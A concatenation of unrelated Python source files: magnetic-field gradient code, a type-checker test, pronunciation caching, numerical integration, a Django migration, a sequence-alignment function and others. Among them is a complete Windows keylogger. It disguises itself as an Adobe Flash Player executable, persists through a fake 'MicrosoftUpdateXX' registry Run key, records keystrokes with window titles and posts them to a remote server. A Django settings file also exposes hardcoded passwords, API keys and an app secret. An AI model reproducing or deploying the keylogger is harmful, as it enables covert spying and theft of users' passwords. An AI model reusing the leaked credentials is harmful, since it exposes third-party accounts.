#Rvol = np.ndarray((t_master.shape[0], 3, 3))
#for i in range(t_master.shape[0]):
# #rvol_step = np.zeros([3,3]) # Stepwise method gives same result as explicit below
# #for sc in range(4):
# # rvol_step = rvol_step + np.outer(rarr[sc,i,:], rarr[sc,i,:])
# ## endfor
# #Rvol[i,:,:] = (1./4.) * (rvol_step - np.outer(rm[i,:], rm[i,:]))
# #Rvol[i,:,:] = (1./4.)*((np.outer(rarr[0,i,:], rarr[0,i,:]) + np.outer(rarr[1,i,:], rarr[1,i,:]) + np.outer(rarr[2,i,:], rarr[2,i,:]) + np.outer(rarr[3,i,:], rarr[3,i,:])) - np.outer(rm[i,:], rm[i,:])) # give same result as stepwise above
# Intermediate variable to hold the self-outer-product of rm at each timestep
##rmOuter = np.einsum('...i,...j->...ij',rm,rm) # explicit form 'outer product' use of EinSum, broadcast across leading dimensions
# Intermediate variable to hold the self-outer-product of rarr, per bird, at each timestep
##rarrOuter = np.einsum('...i,...j->...ij',rarr,rarr) # Same as line above
##Rvol = np.divide(np.add.reduce(rarrOuter) - rmOuter, rarr.shape[0]) # give same result as stepwise Rvol code commented out above.
# Brief description of operations in above line:
# All of the following occur for each timestep...
# 1) Collapse the self-outer-products of rarr by summing across all spacecraft
# 2) From above result, subtract the self-outer-product of rm (position of mesocenter)
# 3) Divide resultant array from above step by the number of spacecraft
## End Section: old, not-actually correct code
## Explicit equation construction from "Analysis Methods for Multi-Spacecraft Data" Paschmann ed.
rrarr = np.matmul(rarr[:,:,:,None], rarr[:,:,None,:]) # the r_a*r_a^T term from (12.23)
rmrm = np.matmul(rm[:,:,None], rm[:,None,:]) # the r_b*r_b^T term from (12.23)
# This just expands the r_b*r_b^T term to match the shape of rrar above for easy broadcast of the subtraction and summation
# rmrm_expanded = np.repeat(rmrm[None,:,:,:], repeats=rrarr.shape[0], axis=0)
# partial_R is every term inside the summation of (12.23)
# ie. R = 1/N * sum(n=1..numBirds, partial_R[n]
# partial_R = rrarr - rmrm_expanded
# results is R as defined by (12.23) for all time steps, with shape (timesteps, 3, 3)
Rvol = np.subtract(np.divide(np.add.reduce(rrarr, axis=0), rarr.shape[0]), rmrm) # more efficient - AJR
# Rvol = np.divide(np.add.reduce(partial_R),partial_R.shape[0])
# Pre-calculate the inverse array of Rvol here to avoid needless recalculation later.
Rinv = np.linalg.inv(Rvol)
# Stepwise calculation of gradient and curvature using the Harvey method
#a_ne_b_list=[[1,2,3],[2,3],[3]]
#grad_Harvey = np.ndarray((t_master.shape[0], 3, 3))
#curve_Harvey = np.ndarray((t_master.shape[0], 3))
#for t in range(t_master.shape[0]): # steps through each time step
# for i in range(3): # for final i-component of the gradient
# for j in range(3): # for final j-component of the gradient
# dbdr = np.zeros(3) # a != b summation row vector from Harvey. Re-initialized as zeros for each i,j
# for k in range(3): # step through k-index. May be able to eliminate this with vectorization later
# for a in range(3): # step through spacecraft MMS1-3; MMS4 done implicitly
# for b in a_ne_b_list[a]: # Does not contain MMS1 (done by stepping through it in previous loop); provides sc_a != sc_b summation in Harvey (12.18)
# dbdr[k] = dbdr[k] + ((barr[a,t,i] - barr[b,t,i]) * (rarr[a,t,k] - rarr[b,t,k]))
# # endfor
# # endfor
# # endfor
# # grad_Harvey[t,i,j] = (1./16.) * np.matmul(dbdr, Rinv[t,:,j]) # Gives the same result as below
# grad_Harvey[t,i,j] = (1./16.) * np.matmul(Rinv[t,:,j], dbdr) # Gives the same result as below
# #grad_Harvey[t,i,j] = (1./16.) * np.matmul(dbdr, np.linalg.inv(Rvol[t,:,:])[:,j]) # Maybe linalg.inv doesn't vectorize the way I think?
# # endfor
# # curve_Harvey[t,:] = np.matmul(bm[t,:], grad_Harvey[t,:,:]) # same thing, probably just should be matrix mult.
# curve_Harvey[t,:] = np.matmul(grad_Harvey[t,:,:], bm[t,:]) # Order of matmul has BIG effect!
## endfor
# Vectorized matrix operations to calculate the above. Saves a lot of compute time at the expense of a little memory.
tmpR = np.repeat(rarr[np.newaxis,:,:,:],rarr.shape[0],axis=0) # Stretch the array to be 2-D instead of 1-D for the sats. Required for next operation.
# triR = np.triu(np.rollaxis(np.rollaxis(np.transpose(tmpR,axes=(1,0,2,3)) - tmpR, -1), -1)) # This produces a triangular matrix of dR=D_a - D_b, for all [a != b]
diffR = np.subtract(np.moveaxis(tmpR, [0,1], [1,0]), tmpR)
triR = np.moveaxis(np.triu(np.moveaxis(diffR, [0,1], [-2,-1]), 1), [-2,-1], [0,1]) # updates from depreciating 'rollaxis' and makes a bit more readable what's happening -AJR
tmpB = np.repeat(barr[np.newaxis,:,:,:],barr.shape[0],axis=0) # Same as above, but with B instead
# triB = np.triu(np.rollaxis(np.rollaxis(np.transpose(tmpB,axes=(1,0,2,3)) - tmpB, -1), -1)) # Again, dB=B_a - B_b, for all [a != b]
diffB = np.subtract(np.moveaxis(tmpB, [0,1], [1,0]), tmpB)
triB = np.moveaxis(np.triu(np.moveaxis(diffB, [0,1], [-2,-1]), 1), [-2,-1], [0,1])
#Example of effect of above operations:
# Each b_i below is a 3-vector
#
# Line 249 (at each timestep):
# tmpB =
# [[b_1, b_2, b_3, b_4],
# [b_1, b_2, b_3, b_4],
# [b_1, b_2, b_3, b_4],
# [b_1, b_2, b_3, b_4]]
#
# Line 250, two steps, first array is intermediate form (again, at each timestep):
# diffB =
# [[b_1-b_1, b_1-b_2, b_1-b_3, b_1-b_4],
# [b_2-b_1, b_2-b_2, b_2-b_3, b_2-b_4],
# [b_3-b_1, b_3-b_2, b_3-b_3, b_3-b_4],
# [b_4-b_1, b_4-b_2, b_4-b_3, b_4-b_4]]
#
# triB =
# [[0 , b_1-b_2, b_1-b_3, b_1-b_4],
# [0 , 0 , b_2-b_3, b_2-b_4],
# [0 , 0 , 0 , b_3-b_4],
# [0 , 0 , 0 , 0 ]]
# For each timestep t, dtemp[:,t,:] now looks like this:
# dtemp[:,t] = [[dB_x*dR_x, dB_y*dR_y, dB_z*dR_z],
# [dB_x*dR_y, dB_y*dR_z, dB_z*dR_x],
# [dB_x*dR_z, dB_y*dR_x, dB_z*dR_y]]
# The below constructs dbdr by twisting the dtemp array to properly place the diagonals for dbdr.
#
# dbdr[t] = [[dtemp[0,t,0], dtemp[1,t,0], dtemp[2,t,0],
# [dtemp[2,t,1], dtemp[0,t,1], dtemp[1,t,1],
# [dtemp[1,t,2], dtemp[2,t,2], dtemp[0,t,2]]
#
# ===
#
# dbdr[t] = [[dB_x*dR_x, dB_x*dR_y, dB_x*dR_z],
# [dB_y*dR_x, dB_y*dR_y, dB_y*dR_z],
# [dB_z*dR_x, dB_z*dR_y, dB_z*dR_z]]
#
dbdr = np.add.reduce(np.einsum('...i,...j->...ij', triB, triR), axis=(0,1)) # creates a [time, 3x3 array] array
grad_Harvey = (1/rarr.shape[0])**2 * np.matmul(dbdr, Rinv) # same as np.einsum('...ij,...jk->ik', dbdr, Rinv)
# The calculated gradient (B_i/d_j) is transposed from the accepted index order for the gradient (d_i B_j) so last thing we do is swap the last two axis
grad_Harvey = np.moveaxis(grad_Harvey, [-2,-1], [-1,-2])
# The above is certainly more readable than the version below and (fingers crossed) clears up an inverted vector issue in the code following - AJR
### # Calculate the partial components for dbdr
### dtemp = np.ndarray((3, t_master.shape[0], 3))
### dtemp[0] = np.einsum('...ab,...ab',triB,triR) #This gets us the diagonals of dbdr for B_i and R_i (eg, both x components, both y, ...)
### dtemp[1] = np.einsum('...ab,...ab',triB,np.roll(triR,-1,axis=1)) #This gets us the diagonals of dbdr for B_i and R_mod(i+1) (eg, B_x * R_y, ...)
### dtemp[2] = np.einsum('...ab,...ab',triB,np.roll(triR,-2,axis=1)) #This gets us the diagonals of dbdr for B_i and R_mod(i+2) (eg, B_y * R_x, ...)
###
### # Constructs dbdr matrix for each timestep, where dbdr[i,j] will return the relavant dB_i*dR_j resultant vector
### dbdr = np.einsum('...i,...ij->...ij',dtemp[0],np.identity(3)) + \
### np.einsum('...i,...ij->...ij',dtemp[1],(np.roll(np.identity(3),-1,axis=0))) + \
### np.einsum('...i,...ij->...ij',dtemp[2],(np.roll(np.identity(3),-2,axis=0)))
###
### # This calculates and holds the diagonals for the Harvey gradient. I'm sure there's some simpler way to calculate this, but I haven't found it yet.
### # This eventually gets us to the Harvey gradients in the same manner as we got dbdr above.
### tmpHarv = np.ndarray((3, t_master.shape[0], 3))
### tmpHarv[0] = np.divide(np.einsum('...i,...i',np.moveaxis(Rinv,1,-1),dbdr),np.square(numBirds))
### tmpHarv[1] = np.divide(np.einsum('...i,...i',np.moveaxis(Rinv,1,-1),np.roll(dbdr,-1,1)),np.square(numBirds))
### tmpHarv[2] = np.divide(np.einsum('...i,...i',np.moveaxis(Rinv,1,-1),np.roll(dbdr,-2,1)),np.square(numBirds))
###
### # Constructs the gradient matrix for each timestep from the diagonals calculated in the above steps.
### grad_Harvey = \
### np.einsum('...i,...ij->...ij',tmpHarv[0],np.identity(3)) + \
### np.einsum('...i,...ij->...ij',tmpHarv[1],(np.roll(np.identity(3),-1,axis=0))) + \
### np.einsum('...i,...ij->...ij',tmpHarv[2],(np.roll(np.identity(3),-2,axis=0)))
## List of references for how numpy.einsum operates:
#
# Official docs on einsum (as of numpy 1.18): https://numpy.org/doc/1.18/reference/generated/numpy.einsum.html
# General explanation of einsum: https://stackoverflow.com/a/33641428
# Levi-Cevita and einsum: https://stackoverflow.com/a/20890335
# A specific instance of Levi-Cevita with einsum: https://stackoverflow.com/a/20910319
# Solenoid correction was implented then removed due to negligable impact on results.
# Original stepwise code for solenoid correction is preseved in the below string in case of future need.
'''
# Solenoid correction from Harvey (12.20)
# lm = np.ndarray((t_master.shape[0]))
lm = np.divide(np.trace(grad_Harvey, axis1=1, axis2=2), np.trace(Rinv, axis1=1, axis2=2))
nRinv = np.ndarray(Rinv.shape)
for t in range(t_master.shape[0]):
nRinv[t,:,:] = lm[t]*Rinv[t,:,:]
sol_grad_Harvey = grad_Harvey - nRinv
sol_curve_Harvey = np.ndarray((t_master.shape[0], 3))
for t in range(t_master.shape[0]):
sol_curve_Harvey[t,:] = np.matmul(sol_grad_Harvey[t,:,:], bm[t,:])
''' # Solenoid correction has little effect, which is not surprising
return grad_Harvey, bm, bmag, rm, t_master
def mms_Curvature(grad, bm):
'''
function to calculate magnetic field line curvature vector k = b · grad(b) from the
magnetic field spacial gradient (grad) and the normalized magnetic field vector at
the barycenter of the spacecraft formation (bm)
Inputs:
grad : a time series array with dimensions t x 3 x 3 representing the spacial
gradient of the normalized magnetic field grad(b) at each time step.
Assumed to be the output from the mms_Grad function described in this
library module.
bm : a time series array with dimensions t x 3 representing the normalized
vector magnetic field b = B/|B| at each time step. Assumed to be the
output of the mms_Grad function described in this library.
---NB: 'grad' and 'bm' are assumed to have identical timesteps, beginning, and
ending times, as expected from the outputs of the mms_Grad function
described in this library.
Outputs:
curve_Harvey : a time series array with dimensions t x 3 representing the
magnetic field line curvature vector in 3 dimensions at the
same time steps as used for the input arrays.
'''
# And now the final curvature may be calculated by simple matrix multiplication for each timestep.
# The below gives identical results as, but is much more efficient than:
# for t in range(t_master.shape[0]): curve_Harvey[t] = np.matmul(grad_Harvey[t], bm[t])
curve_Harvey = np.einsum('...ij,...i', grad, bm)
return curve_Harvey
def mms_CurlB(Grad):
'''
Function to calculate the curl of the magnetic field by applying a rank 3
Levi-Civita tensor to the spacial gradient of the full vector magnetic
field (NOTE: NOT the gradient of the normalized vector magnetic field as
used in the curvature vector calculation).
Inputs:
Grad : A time series array with dimensions t x 3 x 3 representing the
spacial gradient of the vector magnetic field grad(B) at each
time step. Assumed to be the output from the mms_Grad function
described in this library module.
Outputs:
CurlB : A time series array with dimensions t x 3 representing the curl
of the vector magnetic field in 3 dimensions at the same time
steps as used for hte input Grad array.
'''
# Define the rank 3 Levi-Civita tensor
LevCiv3 = np.zeros((3,3,3))
LevCiv3[0,1,2] = LevCiv3[1,2,0] = LevCiv3[2,0,1] = 1
LevCiv3[0,2,1] = LevCiv3[2,1,0] = LevCiv3[1,0,2] = -1
CurlB = np.einsum('ijk,...jk',LevCiv3, Grad)
return CurlB
def mms_DivB(Grad):
'''
Function to calculate the divergence of the magnetic field by taking the
trace of the spacial gradient fo the full vector magnetic field (NOTE:
NOT the gradient of the normalized vector magnetic foeld as used in the
curvature vector calculation).
Inputs:
Grad : A time series array with dimensions t x 3 x 3 representing the
spacial gradient of the vector magnetic field grad(B) at each
time step. Assumed to be the output from the mms_Grad function
described in this library module.
Outputs:
DivB : A time series array with dimension t representing the divergence
of the vector magnetic field div(B) at the same time steps as
used for the input Grad array.
'''
#DivB = np.einsum('...ii', Grad) # Equivalent to taking the trace of grad(B) at each time step
DivB = np.trace(np.swapaxes(Grad, 1,2), axis1=1, axis2=2)
return DivB
|
# This sample tests the check for non-overlapping types compared
# with equals comparison.
from typing import Literal, TypeVar, Union
OS = Literal["Linux", "Darwin", "Windows"]
def func1(os: OS, val: Literal[1, "linux"]):
if os == "Linux":
return True
# This should generate an error because there is no overlap in types.
if os == "darwin":
return False
# This should generate an error because there is no overlap in types.
if os != val:
return False
# This should generate an error because there is no overlap in types.
if val == 2:
return False
if val == 1:
return True
class ClassA: ...
class ClassB: ...
_T1 = TypeVar("_T1")
_T2 = TypeVar("_T2", bound=ClassB)
def func2(a: ClassA, b: ClassB, c: _T1, d: _T2, e: Union[ClassA, ClassB]) -> Union[None, _T1, _T2]:
# This should generate an error because there is no overlap in types.
if a == b:
return
# This should generate an error because there is no overlap in types.
if a != b:
return
if a != c:
return
# This should generate an error because there is no overlap in types.
if a != d:
return
if a == e:
return
if b == e:
return
|
from functools import partial
from logging import getLogger
from multiprocessing import Pool
from typing import Any, Callable, Dict, Optional, Set, Tuple
from ordered_set import OrderedSet
from tqdm import tqdm
from sentence2pronunciation.core import (get_words_from_sentence, get_words_from_sentences, is_annotation,
sentence2pronunciation_from_cache,
symbols_split_iterable,
word2pronunciation)
from sentence2pronunciation.lookup_cache import (LookupCache,
pronunciation_upper)
from sentence2pronunciation.types import Pronunciation, Symbol
def return_input_too(inp: Any, method: Callable[[Any], Any]) -> Tuple[Any, Any]:
return inp, method(inp)
process_unique_words: Set[Pronunciation] = None
def __init_pool_prepare_cache_mp(words: OrderedSet[Pronunciation]) -> None:
global process_unique_words
process_unique_words = words
def __main_prepare_cache_mp(word_index: int, trim_symbols: Set[Symbol], split_on_hyphen: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol], get_pronunciation: Callable[[Pronunciation], Pronunciation]) -> None:
# pylint: disable=global-variable-not-assigned
global process_unique_words
word = process_unique_words[word_index]
pronunciation = word2pronunciation(
word=word,
get_pronunciation=get_pronunciation,
trim_symbols=trim_symbols,
split_on_hyphen=split_on_hyphen,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol,
)
return word, pronunciation
def prepare_cache_mp(sentences: Set[Pronunciation], trim_symbols: Set[Symbol], split_on_hyphen: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol], get_pronunciation: Callable[[Pronunciation], Pronunciation], ignore_case: bool, n_jobs: int, chunksize: int, maxtasksperchild: Optional[int] = None) -> LookupCache:
logger = getLogger(__name__)
logger.info("Getting all words...")
unique_words = get_words_from_sentences(tqdm(sentences))
logger.info("Done.")
if ignore_case:
logger.info("Ignoring case...")
if consider_annotation:
# Note: annotations will be taken as they are, i.e. no upper case since it is not clear which of the annotation will be taken as value later in the cache (if multiple keys merge to one due to upper case).
unique_words = OrderedSet({
word if is_annotation(
word, annotation_split_symbol) else pronunciation_upper(word)
for word in tqdm(unique_words)
})
else:
unique_words = OrderedSet({pronunciation_upper(word) for word in tqdm(unique_words)})
logger.info("Done.")
logger.info("Getting pronunciations...")
method_proxy = partial(
__main_prepare_cache_mp,
get_pronunciation=get_pronunciation,
trim_symbols=trim_symbols,
split_on_hyphen=split_on_hyphen,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol,
)
with Pool(
processes=n_jobs,
initializer=__init_pool_prepare_cache_mp,
initargs=(unique_words,),
maxtasksperchild=maxtasksperchild,
) as pool:
pronunciations_to_words: LookupCache = dict(tqdm(
pool.imap_unordered(method_proxy, range(len(unique_words)), chunksize=chunksize),
total=len(unique_words),
))
logger.info("Done.")
return pronunciations_to_words
process_lookup_cache: LookupCache = None
process_sentences: OrderedSet[Pronunciation] = None
def __main_sentences2pronunciations_from_cache_mp(sentence_index: int, ignore_case: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol]) -> Tuple[Pronunciation, Pronunciation]:
# pylint: disable=global-variable-not-assigned
global process_lookup_cache
# pylint: disable=global-variable-not-assigned
global process_sentences
sentence = process_sentences[sentence_index]
pronunciation = sentence2pronunciation_from_cache(
sentence=sentence,
ignore_case=ignore_case,
cache=process_lookup_cache,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol
)
return sentence, pronunciation
def __init_pool_sentences2pronunciations_from_cache_mp(cache: LookupCache, sentences: OrderedSet[Pronunciation]) -> None:
# pylint: disable=global-variable-not-assigned
global process_lookup_cache
# pylint: disable=global-variable-not-assigned
global process_sentences
process_lookup_cache = cache
process_sentences = sentences
def sentences2pronunciations_from_cache_mp(sentences: Set[Pronunciation], ignore_case: bool, consider_annotation: bool, annotation_split_symbol: Optional[Symbol], cache: LookupCache, n_jobs: int, chunksize: int, maxtasksperchild: Optional[int] = None) -> Dict[Pronunciation, Pronunciation]:
logger = getLogger(__name__)
method_proxy = partial(
__main_sentences2pronunciations_from_cache_mp,
ignore_case=ignore_case,
consider_annotation=consider_annotation,
annotation_split_symbol=annotation_split_symbol
)
logger.info("Preparing sentences...")
sentences_with_order = OrderedSet(sentences)
logger.info("Done.")
logger.info("Getting pronunciations from preparation...")
with Pool(
processes=n_jobs,
initializer=__init_pool_sentences2pronunciations_from_cache_mp,
initargs=(cache, sentences_with_order,),
maxtasksperchild=maxtasksperchild,
) as pool:
pronunciations_to_sentences: Dict[Pronunciation, Pronunciation] = dict(tqdm(
pool.imap_unordered(method_proxy, range(len(sentences_with_order)), chunksize=chunksize),
total=len(sentences_with_order),
))
logger.info("Done.")
return pronunciations_to_sentences
|
# NOTE: All sets default for development
DJANGO_ENV = "development"
PG_DEFAULT_DB_NAME = "jc_developer"
PG_DEFAULT_DB_HOST = "localhost"
PG_DEFAULT_DB_PORT = "5432"
PG_DEFAULT_DB_USER = "jc_developer"
PG_DEFAULT_DB_PASS = "jc_developer"
MONGO_DEFAULT_DB_NAME = "suandao"
MONGO_DEFAULT_DB_PORT = 27017
MONGO_DEFAULT_DB_HOST = "localhost"
MONGO_DEFAULT_DB_USER = ""
MONGO_DEFAULT_DB_PASS = ""
REDIS_LOCATION = "redis://127.0.0.1:6379/0"
# REDIS_LOCATION = "redis://:itcm1234*(@101.132.151.156:6379/0"
SERVER_EMAIL_ADDR = "test1@jclife.com"
SERVER_EMAIL_PASS = "Mm041208"
YUNPIAN_API_KEY = "e92698548178322ab51f3aa36ebc4133"
WECHAT_APPID = "wx4707b35ca031c5b1"
WECHAT_SECRET = "b5a42ce5eeb6ed459de76ea152e8dfb2"
CELERY_BROKER_URL = "redis://127.0.0.1:6379/8"
# CELERY_BROKER_URL = "redis://:itcm1234*(@101.132.151.156:6379/8"
CELERY_RESULT_BACKEND = "redis://127.0.0.1:6379/7"
# CELERY_RESULT_BACKEND = "redis://:itcm1234*(@101.132.151.156:6379/7"
|
from integraisGaussLegendre import iterar
import math
a = 0
b = 5
e = 10**-6
f1 = lambda x: (math.log(2*x) * math.cos(4*x))
# f1 = lambda x: (2*x)**3 #Resposta 2
# f2 = lambda x: math.cos(4*x) #Resposta -0.1892006
# f3 = lambda x: (math.sin(2*x) + 4*(x**2) + 3*x)**2 #Resposta 17.8764703
# f4 = lambda x: (x + (3*x)**2 - math.cos(4*x**1.5) + math.e**(x/3)) #Resposta 4.62323
f = [f1]
for i in range(len(f)):
print("Cálculo da integral da função f", i + 1, " com erro de ", e, ":", sep='')
for j in range(2, 5):
I, div = iterar(f[i], a, b, e, j)
print(" ", j, " pontos com ", div, " divisões: ", round(I, 7), sep="")
print()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-18 10:03
from __future__ import unicode_literals
import shoptools.abstractions.models
import shoptools.util
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='SavedCart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(default=datetime.datetime.now)),
('secret', models.UUIDField(db_index=True, default=shoptools.util.make_uuid, editable=False)),
('_shipping_options', models.TextField(blank=True, db_column='shipping_options', default='', editable=False, verbose_name='shipping options')),
('_voucher_codes', models.TextField(blank=True, db_column='voucher_codes', default='', editable=False, verbose_name='voucher codes')),
('order_obj_id', models.PositiveIntegerField(null=True)),
('currency', models.CharField(default='NZD', editable=False, max_length=3)),
('order_obj_content_type', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='contenttypes.ContentType')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
bases=(models.Model, shoptools.abstractions.models.ICart),
),
migrations.CreateModel(
name='SavedCartLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_object_id', models.PositiveIntegerField()),
('created', models.DateTimeField(default=datetime.datetime.now)),
('quantity', models.IntegerField()),
('item_content_type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contenttypes.ContentType')),
('parent_object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cart.SavedCart')),
],
options={
'abstract': False,
},
bases=(models.Model, shoptools.abstractions.models.ICartLine),
),
migrations.AlterUniqueTogether(
name='savedcartline',
unique_together=set([('item_content_type', 'item_object_id', 'parent_object')]),
),
]
|
import math
N, K = map(int, input().split())
girls, boys = [], []
while N:
S, Y = map(int, input().split())
if S == 0:
girls.append(Y)
else:
boys.append(Y)
N -= 1
count = 0
girls = sorted(girls)
boys = sorted(boys)
for i in range(6):
count += math.ceil(girls.count(i+1)/K)
count += math.ceil(boys.count(i+1)/K)
print(count)
|
import pythoncom
import pyHook
from os import path
from time import sleep
from threading import Thread
import urllib, urllib2
import datetime
import win32com.client
import win32event, win32api, winerror
from _winreg import *
import shutil
import sys
import base64
import requests
ironm = win32event.CreateMutex(None, 1, 'NOSIGN')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
ironm = None
print "nope"
sys.exit()
x, data, count= '', '', 0
dir = r"C:\Users\Public\Libraries\adobeflashplayer.exe"
lastWindow = ''
def startup():
shutil.copy(sys.argv[0], dir)
aReg = ConnectRegistry(None, HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosoftUpdateXX", 0, REG_SZ, dir)
if not path.isfile(dir):
startup()
def send_http_post():
global data
while True:
if len(data) > 30:
try:
timeInSecs = datetime.datetime.now()
#SERVER_URL = The server URL to post to
#POST_DATA = The post data to include.
# Use $KeyStream$ for the area of the keystream
# Use $Date$ for the sending date
#BASE64_ENC - if to encode as base64
keysData = data
if BASE64_ENC == 'y':
keysData = base64.encodestring(keysData)
postData = POST_DATA
postData = postData.replace('$KeyStream$', keysData)
postData = postData.replace('$Date$', str(timeInSecs) )
requests.post(SERVER_URL, data=postData)
except Exception as error:
print error
sleep(120)
def pushing(event):
global data, lastWindow
window = event.WindowName
keys = {
13: ' [ENTER] ',
8: ' [BACKSPACE] ',
162: ' [CTRL] ',
163: ' [CTRL] ',
164: ' [ALT] ',
165: ' [ALT] ',
160: ' [SHIFT] ',
161: ' [SHIFT] ',
46: ' [DELETE] ',
32: ' [SPACE] ',
27: ' [ESC] ',
9: ' [TAB] ',
20: ' [CAPSLOCK] ',
38: ' [UP] ',
40: ' [DOWN] ',
37: ' [LEFT] ',
39: ' [RIGHT] ',
91: ' [SUPER] '
}
keyboardKeyName = keys.get(event.Ascii, chr(event.Ascii))
if window != lastWindow:
lastWindow = window
data += ' { ' + lastWindow + ' } '
data += keyboardKeyName
else:
data += keyboardKeyName
if __name__ == '__main__':
triggerThread = Thread(target=send_http_post)
triggerThread.start()
hookManager = pyHook.HookManager()
hookManager.KeyDown = pushing
hookManager.HookKeyboard()
pythoncom.PumpMessages()
|
from enum import Enum
class Action(Enum):
"""Class for enumerations of agent actions."""
UP = (-1, 0)
DOWN = (1, 0)
LEFT = (0, -1)
RIGHT = (0, 1)
|
from math import inf
from typing import Dict, List, Tuple, Optional
from .calculate_score import (
calculate_score,
calculate_complexity_adjusted_score,
)
from .matrices import AlignMatrix
from .performance import timeit
@timeit()
def fill_align_matrix(
lambda_values: List[float],
column_count: int,
edge_start: int,
chunk_size: int,
gap_inits: List[float],
gap_exts: List[float],
skip_align_score: float,
subfams: List[str],
chroms: List[str],
starts: List[int],
stops: List[int],
sub_matrices: List[Dict[str, int]],
background_freqs: List[Optional[Dict[str, float]]],
) -> AlignMatrix:
"""
Fills an alignment score matrix by calculating an alignment score (according
to crossmatch scoring) for every segment of size `chunk_size` for all
sequences.
Scores are based on the surrounding `chunk_size` nucleotides in the
alignment. Ex: column 15 in the matrix holds the aligment score for
nucleotides at positons 0 - 30, assuming `chunk_size` = 31.
Starting and trailing cells are treated differently. For example, column 0
in the matrix holds the alignment score for nucleotides 0 - 15, column 1
represents nucleotides 0 - 16, etc. Scores are weighted based on number of
nucleotides that contribute to the score.
This algorithm ignores all padded indices (".") in the chroms and subfams
lists.
Speed up by computing base score for the first segment, moves to next column
but adding next chars score to base score and subtracting previous chars
score from base score. Restarts and recomputes new base score when
necessary.
Inputs:
everything needed for CalcScore()
edge_start: where alignment starts on the target/chrom sequence
chunk_size: size of nucletide chunks that are scored
skip_align_score: alignment score to give the skip state (default = 0)
subfams: alignments to calculate scores from
chroms: alignments to calculate scores from
starts: where in the target sequence the competing alignments start
Outputs:
align_matrix: Hash implementation of sparse 2D matrix used in pre-DP calculations.
Key is tuple[int, int] that maps row, col to the value held in that cell of matrix. Rows
are subfamilies in the input alignment file, cols are nucleotide positions in the target sequence.
>>> chros = ["", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT...............", "TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT..............."]
>>> subs = ["", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...............", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA--A..............."]
>>> strts = [0, 2, 0]
>>> stps = [0, 39, 39]
>>> sub_mat = [{"AA":1, "AT":-1, "TA":-1, "TT":1, "..":0}] * 3
>>> back_freqs = [None] * 3
>>> m = fill_align_matrix([0.0, 0.1, 0.1], 41, 0, 31, [0, -25, -25], [0, -5, -5], 1.0, subs, chros, strts, stps, sub_mat, back_freqs)
>>> m
{(1, 3): 3.1, (1, 4): 3.1, (1, 5): 3.1, (1, 6): 3.1, (1, 7): 3.1, (1, 8): 3.1, (1, 9): 3.1, (1, 10): 3.1, (1, 11): 3.1, (1, 12): 3.1, (1, 13): 3.1, (1, 14): 3.1, (1, 15): 3.1, (1, 16): 3.1, (1, 17): 3.1, (1, 18): 3.1, (1, 19): 3.1, (1, 20): 3.1, (1, 21): 3.1, (1, 22): 3.1, (1, 23): 3.1, (1, 24): 3.1, (1, 25): 2.9000000000000004, (1, 26): 2.8933333333333335, (1, 27): 2.8862068965517245, (1, 28): 2.878571428571429, (1, 29): 2.8703703703703702, (1, 30): 2.861538461538462, (1, 31): 2.8520000000000003, (1, 32): 2.841666666666667, (1, 33): 2.8304347826086955, (1, 34): 2.8181818181818183, (1, 35): 2.804761904761905, (1, 36): 2.7900000000000005, (1, 37): 2.7736842105263158, (1, 38): 2.7555555555555555, (1, 39): 2.735294117647059, (1, 40): 2.7125000000000004, (2, 1): 2.7125000000000004, (2, 2): 2.735294117647059, (2, 3): 2.755555555555556, (2, 4): 2.7736842105263158, (2, 5): 2.79, (2, 6): 2.804761904761905, (2, 7): 2.8181818181818183, (2, 8): 2.830434782608696, (2, 9): 2.841666666666667, (2, 10): 2.8520000000000003, (2, 11): 2.861538461538462, (2, 12): 2.8703703703703702, (2, 13): 2.8785714285714286, (2, 14): 2.8862068965517245, (2, 15): 2.8933333333333335, (2, 16): 2.9000000000000004, (2, 17): 3.1, (2, 18): 3.1, (2, 19): 3.1, (2, 20): 3.1, (2, 21): 3.1, (2, 22): 3.1, (2, 23): 0.5, (2, 24): -0.1, (2, 25): -0.30000000000000004, (2, 26): -0.41333333333333333, (2, 27): -0.5344827586206897, (2, 28): -0.6642857142857143, (2, 29): -0.8037037037037037, (2, 30): -0.9538461538461539, (2, 31): -1.116, (2, 32): -1.291666666666667, (2, 33): -1.482608695652174, (2, 34): -1.6909090909090907, (2, 35): -1.9190476190476191, (2, 36): -2.17, (2, 37): -2.447368421052632, (2, 38): -2.7555555555555555, (2, 39): -3.1, (2, 40): -3.4875000000000003, (0, 0): 1.0, (0, 1): 1.0, (0, 2): 1.0, (0, 3): 1.0, (0, 4): 1.0, (0, 5): 1.0, (0, 6): 1.0, (0, 7): 1.0, (0, 8): 1.0, (0, 9): 1.0, (0, 10): 1.0, (0, 11): 1.0, (0, 12): 1.0, (0, 13): 1.0, (0, 14): 1.0, (0, 15): 1.0, (0, 16): 1.0, (0, 17): 1.0, (0, 18): 1.0, (0, 19): 1.0, (0, 20): 1.0, (0, 21): 1.0, (0, 22): 